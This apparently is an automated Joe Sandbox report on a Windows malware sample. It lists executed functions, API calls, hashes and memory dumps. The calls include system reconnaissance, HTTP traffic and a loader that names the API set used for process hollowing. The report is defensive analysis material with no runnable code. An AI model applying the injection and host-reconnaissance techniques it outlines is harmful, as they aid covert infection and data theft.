                                                                                                                                                                                                                          • API String ID: 0-1187634490
                                                                                                                                                                                                                          • Opcode ID: 0f39225254e38fad32dbd70442b8e73eff71d7d6e370346ea9138bdfdd326470
                                                                                                                                                                                                                          • Instruction ID: 78e0085dc38c8cc2828c5f014735b63f8bfe2664f44844f501275653cd8e70aa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f39225254e38fad32dbd70442b8e73eff71d7d6e370346ea9138bdfdd326470
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E441A0216093C14FD3179B3D98A46D27FF0BF97598B0A41DBD4C8CF2A3DA289849C796

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:2.3%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:6%
                                                                                                                                                                                                                          Total number of Nodes:50
                                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                                          execution_graph 10681 43e893 10682 43e895 10681->10682 10691 40130b memset memset 10682->10691 10684 43e8b0 10685 4010c6 VirtualAllocExNuma 10684->10685 10686 43e8ba 10685->10686 10687 40168c GetPEB 10686->10687 10688 43e8c4 10687->10688 10689 43d191 OpenEventA 10688->10689 10690 43e8e2 10689->10690 10692 40135d 10691->10692 10693 431442 10694 431454 GetUserNameA 10693->10694 10696 431480 10697 431492 GetComputerNameA 10696->10697 10699 440f40 10700 440f57 LoadLibraryA 10699->10700 10702 441399 10700->10702 10703 401046 VirtualAlloc 10704 401070 10703->10704 10705 43d4eb 10706 43d508 CreateDirectoryA 10705->10706 10708 43d5e4 10706->10708 10714 43c684 10708->10714 10715 43c6a4 10714->10715 10718 43c1c2 10715->10718 10719 43c1f0 10718->10719 10728 418160 InternetCloseHandle 10719->10728 10730 417e7d 10719->10730 10733 417f58 10719->10733 10736 417ec8 10719->10736 10739 417d09 10719->10739 10743 417e16 InternetConnectA 10719->10743 10744 418024 InternetReadFile 10719->10744 10729 418116 10728->10729 10731 417ecf HttpOpenRequestA 10730->10731 10734 417f73 HttpSendRequestA 10733->10734 10735 417fa9 10734->10735 10737 417ecf HttpOpenRequestA 10736->10737 10740 417d40 InternetOpenA 10739->10740 10742 417dc4 10740->10742 10745 414de8 10746 414e0f InternetCrackUrlA 10745->10746 10748 414ec1 10746->10748 10749 44163a 10750 44165c LoadLibraryA 10749->10750 10752 442112 LoadLibraryA LoadLibraryA 10750->10752 10753 44217b LoadLibraryA LoadLibraryA 10752->10753 10755 442220 LoadLibraryA 10753->10755 10756 4016ef lstrcmpiW

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 00431442 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 151 431442-43147f GetUserNameA
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetUserNameA.ADVAPI32(00000000), ref: 00431475
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2645101109-0
                                                                                                                                                                                                                          • Opcode ID: b3eafffca078be2ca2c018cc31f46bd908eb18f9321fcc2fcf0672908623ba27
                                                                                                                                                                                                                          • Instruction ID: 25aa36c17c4d92c73a0d58bc3163748de46586a953a07f777331ccfe371363d9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3eafffca078be2ca2c018cc31f46bd908eb18f9321fcc2fcf0672908623ba27
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6AE086B23011102FD619975DAC81FAB739DDFC8264B0A0035F504C3310E6646C2187BA
                                                                                                                                                                                                                          Function 00418024 Relevance: 1.5, APIs: 1, Instructions: 17filenetworkCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 157 418024-41805c InternetReadFile
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000007CF,?), ref: 0041803A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileInternetRead
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 778332206-0
                                                                                                                                                                                                                          • Opcode ID: 9e5e9da609210bfc34dd9cb12f2909040bfa62032e106f0ed9d883535949a094
                                                                                                                                                                                                                          • Instruction ID: b6fb03e5c75202f5bdf7690399e95dcf118b51c36a476518bdd44740d121225c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e5e9da609210bfc34dd9cb12f2909040bfa62032e106f0ed9d883535949a094
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDE04F31B1012B9FEB14DB60DC84E5233BABBC8704B108468D105A7115E6B1A907CF91
                                                                                                                                                                                                                          Function 0044163A Relevance: 25.1, APIs: 6, Strings: 8, Instructions: 642libraryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 44163a-44224d LoadLibraryA * 6
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(0066B8DB), ref: 004420E9
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(0066B8F3), ref: 0044212F
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(0066B8FF), ref: 00442152
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(0066B926), ref: 004421BB
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(0066B931), ref: 004421DE
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00442224
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                          • String ID: CreateProcessA$GetThreadContext$ReadProcessMemory$ResumeThread$SetThreadContext$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                                                                          • API String ID: 1029625771-2674769033
                                                                                                                                                                                                                          • Opcode ID: d2e29452b506b0bcd63bc073f10d87eac2d6dbddab4f12e8569b0d0ddb8d4792
                                                                                                                                                                                                                          • Instruction ID: fb63d92a9f115e913b2f9b718a076d9a6120d16dab0c00aa961a01dad6639e5b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2e29452b506b0bcd63bc073f10d87eac2d6dbddab4f12e8569b0d0ddb8d4792
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C729EB4291240EFCB86EF19ED99811B7AAFB8D306316816DD87587374F7B1AC10DB09
                                                                                                                                                                                                                          Function 0043D4EB Relevance: 4.7, APIs: 3, Instructions: 188networkCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0043D5C8
                                                                                                                                                                                                                          • InternetOpenA.WININET ref: 0043D66B
                                                                                                                                                                                                                          • InternetOpenA.WININET ref: 0043D698
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InternetOpen$CreateDirectory
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1348255353-0
                                                                                                                                                                                                                          • Opcode ID: 47b612a1a10fd9f4aba7bf2a16fbe2945ecdc5d64efd2cd809614f0ad62f8ec8
                                                                                                                                                                                                                          • Instruction ID: 6651fc40df9015f60e6afa682878b20fc325aeecd42d68c33a1dafcfb698edc4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47b612a1a10fd9f4aba7bf2a16fbe2945ecdc5d64efd2cd809614f0ad62f8ec8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8711272B002148FCB51DF6CDC91BA9B3F5BF88604F04467DE819D3351EB70AA998B5A
                                                                                                                                                                                                                          Function 00417E7D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40networkCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 91 417e7d-417f47 HttpOpenRequestA
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00417F2A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HttpOpenRequest
                                                                                                                                                                                                                          • String ID: GET
                                                                                                                                                                                                                          • API String ID: 1984915467-1805413626
                                                                                                                                                                                                                          • Opcode ID: 062854b03fa9b6577b3a74efd1b22bff19191b9f15f07d692b7de5ab155089a2
                                                                                                                                                                                                                          • Instruction ID: 8e83dcfa2c2d97efb602a18a9ba3dc01c5ea0efa355a390095ddbcd516262747
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 062854b03fa9b6577b3a74efd1b22bff19191b9f15f07d692b7de5ab155089a2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6012CB5F15229DFE710DFA8CC80E7B77F9EB48700B154024E910E7321E6B49C018B65
                                                                                                                                                                                                                          Function 00417EC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39networkCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 94 417ec8-417f47 HttpOpenRequestA
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,GET,?,?,00000000,00000000,?,00000000), ref: 00417F2A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HttpOpenRequest
                                                                                                                                                                                                                          • String ID: GET
                                                                                                                                                                                                                          • API String ID: 1984915467-1805413626
                                                                                                                                                                                                                          • Opcode ID: c66d1da5463de27d8b4bae67896555a8706cc2ef2a306578294b9fcb2610e284
                                                                                                                                                                                                                          • Instruction ID: 746a938a8d7015067999d655a9801a7b5ec994f78fa219be27d916c50eeeb009
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c66d1da5463de27d8b4bae67896555a8706cc2ef2a306578294b9fcb2610e284
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2401EC75F11129DFE710DFA8DC80E7B77F9EB48710B058124E910E7325E7B598118B65
                                                                                                                                                                                                                          Function 00440F40 Relevance: 1.7, APIs: 1, Instructions: 229libraryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 97 440f40-44138d LoadLibraryA 122 441399-4413c0 97->122
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?), ref: 00441370
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                          • Opcode ID: 799670d38f95c12d1022abae05ea2df1a88d45effb93e2887d36180bafb66c8a
                                                                                                                                                                                                                          • Instruction ID: 4376c3151c101c1f2856b8dd4cb0e85140bd373f91dae02cc3ec93c000e5ac0a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 799670d38f95c12d1022abae05ea2df1a88d45effb93e2887d36180bafb66c8a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09C17779606600DFCB04DF6ADC58910B7A6EB883053D5A06DD80A8777EEBF15C93CB0A
                                                                                                                                                                                                                          Function 00414DE8 Relevance: 1.6, APIs: 1, Instructions: 78networkCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 123 414de8-414ebd InternetCrackUrlA 131 414ec1-414ecb 123->131
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00414EAE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CrackInternet
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1381609488-0
                                                                                                                                                                                                                          • Opcode ID: f0495e73a0cd1ecd227d6a76f46282a41c03316446f7fb33a12e155b2daa8f88
                                                                                                                                                                                                                          • Instruction ID: ad51b445d1971d488cb6eb1a7ddcfcdc88647cb932c96ebc81f61fd4cf75d457
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0495e73a0cd1ecd227d6a76f46282a41c03316446f7fb33a12e155b2daa8f88
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00212B756002049FDB40CF6ADC84E5A77E4FF48214B058175F808C7322D7B4EE568BAA
                                                                                                                                                                                                                          Function 00417D09 Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 132 417d09-417dbb InternetOpenA 137 417dc4-417de0 132->137
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InternetOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2038078732-0
                                                                                                                                                                                                                          • Opcode ID: 5a2dae33c1122239a1467a38b4929007afad54bd86b24ca38b5b100568cd55b3
                                                                                                                                                                                                                          • Instruction ID: d799e9cda3f15cb694ab0866f120829321f9a12d57094e41915ee2447f8f2554
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a2dae33c1122239a1467a38b4929007afad54bd86b24ca38b5b100568cd55b3
